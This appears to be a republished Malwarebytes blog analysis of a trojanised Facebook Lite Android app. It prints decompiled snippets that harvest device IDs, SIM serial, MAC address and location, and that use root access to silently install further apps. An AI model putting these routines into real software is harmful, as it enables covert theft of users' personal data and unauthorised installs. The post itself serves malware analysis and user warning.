A version of the popular mobile app Facebook has been found to be infected with what we detect as Android/Trojan.Spy.FakePlay. Facebook Lite is a more compact version of the popular app that uses less data and claims to work in all network conditions (i.e. where network conditions are poor).
The infected Facebook Lite works as advertised, but with the addition of malicious activities. It does this by using a malicious receivercom.google.update.LaunchReceiver and service com.google.update.GetInst. Note the use of using a receiver and service name that attempts to hide under what some may think is Google Update; something an untrained eye may not catch.
Service com.google.update.LaunchReceiver runs whenever the phone is booted, and immediately runs receiver com.google.update.GetInst.
Log entry from Android Device Monitor
Receiver com.google.update.GetInst contains the bulk of the malicious code. Below are some chunks of code that steal personal information, and installs additional malicious apps.
Code that steals and sends device ID, System Version, MAC address, Phone Model, Location, etc:
WifiInfo localWifiInfo = ((WifiManager)getSystemService("wifi")).getConnectionInfo();
HashMap localHashMap = new HashMap();
localHashMap.put("DeviceId", paramTelephonyManager.getDeviceId());
localHashMap.put("SystemVersion", Build.VERSION.RELEASE);
localHashMap.put("Mac", localWifiInfo.getMacAddress());
localHashMap.put("PhoneType", Build.MODEL);
localHashMap.put("NetworkOperatorName", paramTelephonyManager.getNetworkOperatorName());
localHashMap.put("SimSerialNumber", paramTelephonyManager.getSimSerialNumber());
localHashMap.put("Location", a());
Code to install additional apps:
localProcess = Runtime.getRuntime().exec("su");
PrintWriter localPrintWriter = new PrintWriter(localProcess.getOutputStream());
localPrintWriter.println("chmod 777 " + paramString);
localPrintWriter.println("export LD_LIBRARY_PATH=/vendor/lib:/system/lib");
localPrintWriter.println("pm install -r " + paramString);
localPrintWriter.flush();
localPrintWriter.close();
The literal meaning of Trojan when it comes to computing is quote from Wikipedia any malicious computer program which is used to hack into a computer by misleading users of its true intent. This particular piece of mobile malware is a perfect example; it misleads by infecting a legit app with malicious code and then hides its presence under the name of well-known corporation.
This infected version of Facebook Lite originates from China based on characters found in the code. China does not have access to Google Play and relies on third party apps stores that sometimes contain malicious apps like this. If you in a country that has access to Google Play, we suggest using it over third party apps stores to avoid such infections. Stay safe out there!
Source:https://blog.malwarebytes.com
Working as a cyber security solutions architect, Alisa focuses on application and network security. Before joining us she held a cyber security researcher positions within a variety of cyber security start-ups. She also experience in different industry domains like finance, healthcare and consumer products.